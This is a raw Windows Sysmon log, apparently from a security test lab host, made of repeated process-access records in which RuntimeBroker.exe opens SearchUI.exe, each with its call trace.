12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
